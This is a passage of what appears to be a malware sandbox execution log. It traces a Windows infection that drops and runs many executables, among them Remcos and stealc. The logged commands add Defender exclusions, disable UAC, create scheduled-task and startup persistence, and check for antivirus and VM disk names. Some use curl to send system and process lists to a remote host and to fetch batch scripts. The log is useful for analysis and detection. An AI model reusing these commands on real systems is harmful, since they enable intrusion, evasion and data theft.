C:\Users\Admin\AppData\Local\Temp\Files\yiklfON.exe"C:\Users\Admin\AppData\Local\Temp\Files\yiklfON.exe"4⤵
- Executes dropped EXE
PID:3972
-
-
C:\Users\Admin\AppData\Local\Temp\Files\yiklfON.exe"C:\Users\Admin\AppData\Local\Temp\Files\yiklfON.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:708
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\ChatLife.exe"C:\Users\Admin\AppData\Local\Temp\Files\ChatLife.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:312 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c copy Confirmed Confirmed.cmd & Confirmed.cmd4⤵
- Suspicious use of WriteProcessMemory
PID:1888 -
C:\Windows\SysWOW64\tasklist.exetasklist5⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:1924
-
-
C:\Windows\SysWOW64\findstr.exefindstr /I "wrsa.exe opssvc.exe"5⤵
- System Location Discovery: System Language Discovery
PID:3632
-
-
C:\Windows\SysWOW64\tasklist.exetasklist5⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:840
-
-
C:\Windows\SysWOW64\findstr.exefindstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe"5⤵PID:4696
-
-
C:\Windows\SysWOW64\cmd.execmd /c md 7683185⤵PID:1596
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V "PhoneAbcSchedulesApr" Nbc5⤵PID:4892
-
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b Challenged + Diy + Teachers + California + Mba + Yarn + Payable + Zdnet + Plumbing + Pe + Trick + Betting + Absence + Motorcycles + Man + Analyst + Max + Patrick + Pg + Exemption + Sight 768318\B5⤵
- System Location Discovery: System Language Discovery
PID:4164
-
-
C:\Users\Admin\AppData\Local\Temp\768318\Paraguay.pif768318\Paraguay.pif 768318\B5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:944 -
C:\Windows\SysWOW64\cmd.execmd /k echo [InternetShortcut] > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TradeWise.url" & echo URL="C:\Users\Admin\AppData\Local\TradeInsight Technologies\TradeWise.js" >> "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TradeWise.url" & exit6⤵
- Drops startup file
PID:1188
-
-
C:\Users\Admin\AppData\Local\Temp\768318\Paraguay.pifC:\Users\Admin\AppData\Local\Temp\768318\Paraguay.pif6⤵
- Executes dropped EXE
PID:3552
-
-
-
C:\Windows\SysWOW64\timeout.exetimeout 55⤵
- Delays execution with timeout.exe
PID:4608
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\4.exe"C:\Users\Admin\AppData\Local\Temp\Files\4.exe"3⤵
- Executes dropped EXE
PID:868
-
-
C:\Users\Admin\AppData\Local\Temp\Files\3dismhost.exe"C:\Users\Admin\AppData\Local\Temp\Files\3dismhost.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2912
-
-
C:\Users\Admin\AppData\Local\Temp\Files\2020.exe"C:\Users\Admin\AppData\Local\Temp\Files\2020.exe"3⤵
- Executes dropped EXE
PID:4124 -
C:\Users\Admin\AppData\Local\Temp\Files\2020.exe"C:\Users\Admin\AppData\Local\Temp\Files\2020.exe"4⤵
- Drops startup file
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3400 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "ver"5⤵PID:5024
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\_MEI41242\Blsvr.exe5⤵PID:776
-
C:\Users\Admin\AppData\Local\Temp\_MEI41242\Blsvr.exeC:\Users\Admin\AppData\Local\Temp\_MEI41242\Blsvr.exe6⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
PID:2180
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\mi.exe"C:\Users\Admin\AppData\Local\Temp\Files\mi.exe"3⤵
- Executes dropped EXE
PID:1588
-
-
C:\Users\Admin\AppData\Local\Temp\Files\H8hsp6zrMtJI2hC.exe"C:\Users\Admin\AppData\Local\Temp\Files\H8hsp6zrMtJI2hC.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:4376 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\Files\H8hsp6zrMtJI2hC.exe"4⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:876
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\VdjkHVtJ.exe"4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:4416
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\VdjkHVtJ" /XML "C:\Users\Admin\AppData\Local\Temp\tmpDAAB.tmp"4⤵
- Scheduled Task/Job: Scheduled Task
PID:4444
-
-
C:\Users\Admin\AppData\Local\Temp\Files\H8hsp6zrMtJI2hC.exe"C:\Users\Admin\AppData\Local\Temp\Files\H8hsp6zrMtJI2hC.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:4328
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\patcher.exe"C:\Users\Admin\AppData\Local\Temp\Files\patcher.exe"3⤵
- Executes dropped EXE
PID:4824 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c pHash.bat4⤵PID:3252
-
C:\Windows\system32\curl.execurl -o "pHash" "http://144.172.71.105:1338/nova_flow/patcher.exe?hash"5⤵PID:632
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\7cl16anh.exe"C:\Users\Admin\AppData\Local\Temp\Files\7cl16anh.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:808 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c copy Impacts Impacts.bat & Impacts.bat4⤵
- System Location Discovery: System Language Discovery
PID:4960 -
C:\Windows\SysWOW64\tasklist.exetasklist5⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:3852
-
-
C:\Windows\SysWOW64\findstr.exefindstr /I "wrsa opssvc"5⤵PID:4164
-
-
C:\Windows\SysWOW64\tasklist.exetasklist5⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:2804
-
-
C:\Windows\SysWOW64\findstr.exefindstr -I "avastui avgui bdservicehost nswscsvc sophoshealth"5⤵
- System Location Discovery: System Language Discovery
PID:5060
-
-
C:\Windows\SysWOW64\cmd.execmd /c md 5786785⤵
- System Location Discovery: System Language Discovery
PID:5092
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V "PEACEFOLKSEXUALISLANDS" Hill5⤵PID:2000
-
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b ..\Webpage + ..\Von + ..\Exotic + ..\Relief + ..\Seo + ..\Serious + ..\Myth y5⤵PID:4156
-
-
C:\Users\Admin\AppData\Local\Temp\578678\Cooper.pifCooper.pif y5⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2200
-
-
C:\Windows\SysWOW64\choice.exechoice /d y /t 55⤵PID:3656
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\JJSploit_8.10.7_x64-setup.exe"C:\Users\Admin\AppData\Local\Temp\Files\JJSploit_8.10.7_x64-setup.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:3760
-
-
C:\Users\Admin\AppData\Local\Temp\Files\pei.exe"C:\Users\Admin\AppData\Local\Temp\Files\pei.exe"3⤵
- Executes dropped EXE
PID:3836 -
C:\Users\Admin\AppData\Local\Temp\3188116601.exeC:\Users\Admin\AppData\Local\Temp\3188116601.exe4⤵
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:4772 -
C:\Windows\sysnldcvmr.exeC:\Windows\sysnldcvmr.exe5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4944 -
C:\Users\Admin\AppData\Local\Temp\223522870.exeC:\Users\Admin\AppData\Local\Temp\223522870.exe6⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2008 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f7⤵PID:4284
-
C:\Windows\system32\reg.exereg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f8⤵PID:2592
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "Windows Upgrade Manager"7⤵PID:5060
-
C:\Windows\system32\schtasks.exeschtasks /delete /f /tn "Windows Upgrade Manager"8⤵PID:4684
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\543810920.exeC:\Users\Admin\AppData\Local\Temp\543810920.exe6⤵
- Executes dropped EXE
PID:3956 -
C:\Users\Admin\AppData\Local\Temp\1657333799.exeC:\Users\Admin\AppData\Local\Temp\1657333799.exe7⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
PID:3964
-
-
-
C:\Users\Admin\AppData\Local\Temp\864131738.exeC:\Users\Admin\AppData\Local\Temp\864131738.exe6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2124
-
-
C:\Users\Admin\AppData\Local\Temp\1487620755.exeC:\Users\Admin\AppData\Local\Temp\1487620755.exe6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3156
-
-
C:\Users\Admin\AppData\Local\Temp\2863614952.exeC:\Users\Admin\AppData\Local\Temp\2863614952.exe6⤵
- Adds Run key to start application
- Drops file in Windows directory
PID:8668 -
C:\Users\Admin\sysnldcvmr.exeC:\Users\Admin\sysnldcvmr.exe7⤵
- System Location Discovery: System Language Discovery
PID:8824 -
C:\Users\Admin\AppData\Local\Temp\1599224382.exeC:\Users\Admin\AppData\Local\Temp\1599224382.exe8⤵
- Checks computer location settings
PID:8640 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f9⤵PID:5292
-
C:\Windows\system32\reg.exereg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f10⤵PID:7780
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "Windows Upgrade Manager"9⤵PID:7244
-
C:\Windows\system32\schtasks.exeschtasks /delete /f /tn "Windows Upgrade Manager"10⤵PID:6768
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1549524169.exeC:\Users\Admin\AppData\Local\Temp\1549524169.exe8⤵PID:3584
-
-
C:\Users\Admin\AppData\Local\Temp\1094014616.exeC:\Users\Admin\AppData\Local\Temp\1094014616.exe8⤵
- System Location Discovery: System Language Discovery
PID:6244
-
-
C:\Users\Admin\AppData\Local\Temp\32903688.exeC:\Users\Admin\AppData\Local\Temp\32903688.exe8⤵PID:1348
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\iupdate.exe"C:\Users\Admin\AppData\Local\Temp\Files\iupdate.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:3020
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Unit.exe"C:\Users\Admin\AppData\Local\Temp\Files\Unit.exe"3⤵
- Executes dropped EXE
PID:2612
-
-
C:\Users\Admin\AppData\Local\Temp\Files\install2.exe"C:\Users\Admin\AppData\Local\Temp\Files\install2.exe"3⤵
- Executes dropped EXE
PID:2316
-
-
C:\Users\Admin\AppData\Local\Temp\Files\kmvcsaed.exe"C:\Users\Admin\AppData\Local\Temp\Files\kmvcsaed.exe"3⤵
- Executes dropped EXE
PID:3428
-
-
C:\Users\Admin\AppData\Local\Temp\Files\kxfh9qhs.exe"C:\Users\Admin\AppData\Local\Temp\Files\kxfh9qhs.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:608
-
-
C:\Users\Admin\AppData\Local\Temp\Files\alex2022.exe"C:\Users\Admin\AppData\Local\Temp\Files\alex2022.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4168 -
C:\Users\Admin\AppData\Local\Temp\Files\alex2022.exe"C:\Users\Admin\AppData\Local\Temp\Files\alex2022.exe"4⤵
- Executes dropped EXE
PID:448
-
-
C:\Users\Admin\AppData\Local\Temp\Files\alex2022.exe"C:\Users\Admin\AppData\Local\Temp\Files\alex2022.exe"4⤵
- Executes dropped EXE
PID:1356
-
-
C:\Users\Admin\AppData\Local\Temp\Files\alex2022.exe"C:\Users\Admin\AppData\Local\Temp\Files\alex2022.exe"4⤵
- Executes dropped EXE
PID:1504
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\XClient.exe"C:\Users\Admin\AppData\Local\Temp\Files\XClient.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
PID:3532 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Files\XClient.exe'4⤵
- Command and Scripting Interpreter: PowerShell
PID:1388
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\aqbjn3fl.exe"C:\Users\Admin\AppData\Local\Temp\Files\aqbjn3fl.exe"3⤵
- Executes dropped EXE
PID:4848
-
-
C:\Users\Admin\AppData\Local\Temp\Files\IATInfect2008_64.exe"C:\Users\Admin\AppData\Local\Temp\Files\IATInfect2008_64.exe"3⤵
- Executes dropped EXE
PID:1960
-
-
C:\Users\Admin\AppData\Local\Temp\Files\leto.exe"C:\Users\Admin\AppData\Local\Temp\Files\leto.exe"3⤵
- Executes dropped EXE
- Adds Run key to start application
PID:1888 -
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\y8B03.exeC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\y8B03.exe4⤵
- Executes dropped EXE
PID:1152
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\DriverHost.exe"C:\Users\Admin\AppData\Local\Temp\Files\DriverHost.exe"3⤵
- Executes dropped EXE
PID:2624
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Sync.exe"C:\Users\Admin\AppData\Local\Temp\Files\Sync.exe"3⤵
- Executes dropped EXE
PID:4468 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4468 -s 1844⤵
- Program crash
PID:4868
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\305iz8bs.exe"C:\Users\Admin\AppData\Local\Temp\Files\305iz8bs.exe"3⤵
- Executes dropped EXE
PID:2488
-
-
C:\Users\Admin\AppData\Local\Temp\Files\sam.exe"C:\Users\Admin\AppData\Local\Temp\Files\sam.exe"3⤵
- Executes dropped EXE
PID:4140
-
-
C:\Users\Admin\AppData\Local\Temp\Files\defender64.exe"C:\Users\Admin\AppData\Local\Temp\Files\defender64.exe"3⤵
- Executes dropped EXE
PID:5100
-
-
C:\Users\Admin\AppData\Local\Temp\Files\OneDrive.exe"C:\Users\Admin\AppData\Local\Temp\Files\OneDrive.exe"3⤵
- Executes dropped EXE
PID:2548
-
-
C:\Users\Admin\AppData\Local\Temp\Files\jb4w5s2l.exe"C:\Users\Admin\AppData\Local\Temp\Files\jb4w5s2l.exe"3⤵
- Executes dropped EXE
PID:1644
-
-
C:\Users\Admin\AppData\Local\Temp\Files\r2.exe"C:\Users\Admin\AppData\Local\Temp\Files\r2.exe"3⤵
- Executes dropped EXE
PID:3216
-
-
C:\Users\Admin\AppData\Local\Temp\Files\steel.exe"C:\Users\Admin\AppData\Local\Temp\Files\steel.exe"3⤵
- Executes dropped EXE
PID:948
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Taskmgr.exe"C:\Users\Admin\AppData\Local\Temp\Files\Taskmgr.exe"3⤵
- Executes dropped EXE
PID:3644
-
-
C:\Users\Admin\AppData\Local\Temp\Files\pghsefyjhsef.exe"C:\Users\Admin\AppData\Local\Temp\Files\pghsefyjhsef.exe"3⤵
- Executes dropped EXE
PID:1716
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Pichon.exe"C:\Users\Admin\AppData\Local\Temp\Files\Pichon.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
PID:3440 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Loli169.bat" "4⤵PID:3388
-
C:\Windows\System32\Wbem\WMIC.exewmic diskdrive get Model5⤵PID:1344
-
-
C:\Windows\system32\findstr.exefindstr /i "DADY HARDDISK QEMU HARDDISK WDC WDS100T2B0A"5⤵PID:3428
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\LoadNew.exe"C:\Users\Admin\AppData\Local\Temp\Files\LoadNew.exe"3⤵PID:4520
-
-
C:\Users\Admin\AppData\Local\Temp\Files\ATLEQQXO.exe"C:\Users\Admin\AppData\Local\Temp\Files\ATLEQQXO.exe"3⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
PID:1172 -
C:\Users\Admin\AppData\Local\Temp\pyexec.exe"C:\Users\Admin\AppData\Local\Temp\pyexec.exe"4⤵
- Loads dropped DLL
PID:3152 -
C:\Users\Admin\AppData\Roaming\UpdateChrome_Ze\pyexec.exeC:\Users\Admin\AppData\Roaming\UpdateChrome_Ze\pyexec.exe5⤵
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
PID:2628 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe6⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
PID:5588 -
C:\Users\Admin\AppData\Local\Temp\uzfvalidate.exeC:\Users\Admin\AppData\Local\Temp\uzfvalidate.exe7⤵PID:4728
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\ew.exe"C:\Users\Admin\AppData\Local\Temp\Files\ew.exe"3⤵PID:1688
-
-
C:\Users\Admin\AppData\Local\Temp\Files\tdrpload.exe"C:\Users\Admin\AppData\Local\Temp\Files\tdrpload.exe"3⤵
- System Location Discovery: System Language Discovery
PID:4276
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Rage.exe"C:\Users\Admin\AppData\Local\Temp\Files\Rage.exe"3⤵
- Checks computer location settings
PID:1928 -
C:\ProgramData\wvtynvwe\AutoIt3.exe"C:\ProgramData\wvtynvwe\AutoIt3.exe" C:\ProgramData\wvtynvwe\clxs.a3x4⤵PID:4180
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\s.exe"C:\Users\Admin\AppData\Local\Temp\Files\s.exe"3⤵
- System Location Discovery: System Language Discovery
PID:180
-
-
C:\Users\Admin\AppData\Local\Temp\Files\svchost.exe"C:\Users\Admin\AppData\Local\Temp\Files\svchost.exe"3⤵
- Checks computer location settings
- Drops startup file
- Suspicious use of SetWindowsHookEx
PID:312 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Files\svchost.exe'4⤵
- Command and Scripting Interpreter: PowerShell
PID:820
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'4⤵
- Command and Scripting Interpreter: PowerShell
PID:5788
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\svchost.exe'4⤵
- Command and Scripting Interpreter: PowerShell
PID:5976
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'4⤵
- Command and Scripting Interpreter: PowerShell
PID:5056
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\Admin\AppData\Roaming\svchost.exe"4⤵
- Scheduled Task/Job: Scheduled Task
PID:2500
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\M5iFR20.exe"C:\Users\Admin\AppData\Local\Temp\Files\M5iFR20.exe"3⤵PID:3076
-
C:\Windows\SysWOW64\cmd.execmd /c systeminfo > tmp.txt && tasklist >> tmp.txt4⤵
- System Location Discovery: System Language Discovery
PID:2176 -
C:\Windows\SysWOW64\systeminfo.exesysteminfo5⤵
- System Location Discovery: System Language Discovery
- Gathers system information
PID:3696
-
-
C:\Windows\SysWOW64\tasklist.exetasklist5⤵
- Enumerates processes with tasklist
PID:2068
-
-
-
C:\Windows\SysWOW64\curl.execurl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C41646D696E5C417070446174615C4C6F63616C5C54656D705C46696C65735C4D3569465232302E657865" -X POST -H "X-Auth: 2F47554D4C4E4C46452F41646D696E2F32" -H "X-Sec-Id: 0" --data-binary @"C:\Users\Admin\AppData\Local\Temp\tmp.txt" "https://peerhost59mj7i6macla65r.com/search/"4⤵PID:2288
-
-
C:\Windows\SysWOW64\curl.execurl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C41646D696E5C417070446174615C4C6F63616C5C54656D705C46696C65735C4D3569465232302E657865" -H "X-Auth: 2F47554D4C4E4C46452F41646D696E2F32" -H "X-Sec-Id: 3" -Lo "C:\Users\Admin\AppData\Local\Temp\tmp.ini" "https://peerhost59mj7i6macla65r.com/search/"4⤵PID:6084
-
-
C:\Windows\SysWOW64\cmd.execmd /c type "C:\Users\Admin\AppData\Local\Temp\Files\M5iFR20.exe" > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\M5iFR20.exe"4⤵
- Drops startup file
PID:5400
-
-
C:\Windows\SysWOW64\curl.execurl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C41646D696E5C417070446174615C4C6F63616C5C54656D705C46696C65735C4D3569465232302E657865" -H "X-Auth: 2F47554D4C4E4C46452F41646D696E2F32" -Lo "C:\Users\Admin\AppData\Local\Temp\tmp.bat" "https://peerhost59mj7i6macla65r.com/search/"4⤵
- System Location Discovery: System Language Discovery
PID:5536
-
-
C:\Windows\SysWOW64\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\tmp.bat" > C:\Users\Admin\AppData\Local\Temp\tmp.txt4⤵
- System Location Discovery: System Language Discovery
PID:5568
-
-
C:\Windows\SysWOW64\curl.execurl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C41646D696E5C417070446174615C4C6F63616C5C54656D705C46696C65735C4D3569465232302E657865" -X POST -H "X-Auth: 2F47554D4C4E4C46452F41646D696E2F32" -H "X-Sec-Id: 1" --data-binary @"C:\Users\Admin\AppData\Local\Temp\tmp.txt" "https://peerhost59mj7i6macla65r.com/search/"4⤵PID:644
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\marsel.exe"C:\Users\Admin\AppData\Local\Temp\Files\marsel.exe"3⤵PID:1840
-
-
C:\Users\Admin\AppData\Local\Temp\Files\stealc_daval.exe"C:\Users\Admin\AppData\Local\Temp\Files\stealc_daval.exe"3⤵PID:3428
-
-
C:\Users\Admin\AppData\Local\Temp\Files\newtpp.exe"C:\Users\Admin\AppData\Local\Temp\Files\newtpp.exe"3⤵PID:5012
-
-
C:\Users\Admin\AppData\Local\Temp\Files\vorpgkadeg.exe"C:\Users\Admin\AppData\Local\Temp\Files\vorpgkadeg.exe"3⤵
- System Location Discovery: System Language Discovery
PID:576
-
-
C:\Users\Admin\AppData\Local\Temp\Files\AsyncClient.exe"C:\Users\Admin\AppData\Local\Temp\Files\AsyncClient.exe"3⤵
- Checks computer location settings
PID:5116 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "update" /tr '"C:\Users\Admin\AppData\Local\Temp\update.exe"' & exit4⤵PID:5096
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "update" /tr '"C:\Users\Admin\AppData\Local\Temp\update.exe"'5⤵
- Scheduled Task/Job: Scheduled Task
PID:5420
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp979A.tmp.bat""4⤵PID:4896
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵PID:1276
-
-
C:\Windows\SysWOW64\timeout.exetimeout 35⤵
- Delays execution with timeout.exe
PID:5544
-
-
C:\Users\Admin\AppData\Local\Temp\update.exe"C:\Users\Admin\AppData\Local\Temp\update.exe"5⤵PID:5936
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Statement-110122025.exe"C:\Users\Admin\AppData\Local\Temp\Files\Statement-110122025.exe"3⤵
- Checks computer location settings
PID:4564 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\ScreenConnect\c13606fe9009f11d\setup.msi"4⤵
- Enumerates connected drives
- System Location Discovery: System Language Discovery
PID:3728
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\RMX.exe"C:\Users\Admin\AppData\Local\Temp\Files\RMX.exe"3⤵
- Adds policy Run key to start application
- Checks computer location settings
- Adds Run key to start application
- Modifies registry class
PID:2032 -
C:\Windows\SysWOW64\cmd.exe/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f4⤵
- System Location Discovery: System Language Discovery
PID:2208 -
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f5⤵
- UAC bypass
- System Location Discovery: System Language Discovery
- Modifies registry key
PID:1276
-
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\install.vbs"4⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
PID:3396 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c "C:\ProgramData\Remcos\remcos.exe"5⤵PID:2312
-
C:\ProgramData\Remcos\remcos.exeC:\ProgramData\Remcos\remcos.exe6⤵
- Adds policy Run key to start application
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
PID:2732 -
C:\Windows\SysWOW64\cmd.exe/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f7⤵PID:4740
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f8⤵
- UAC bypass
- System Location Discovery: System Language Discovery
- Modifies registry key
PID:5504
-
-
-
\??\c:\program files (x86)\internet explorer\iexplore.exe"c:\program files (x86)\internet explorer\iexplore.exe"7⤵PID:3576
-
-
-
-
-
-
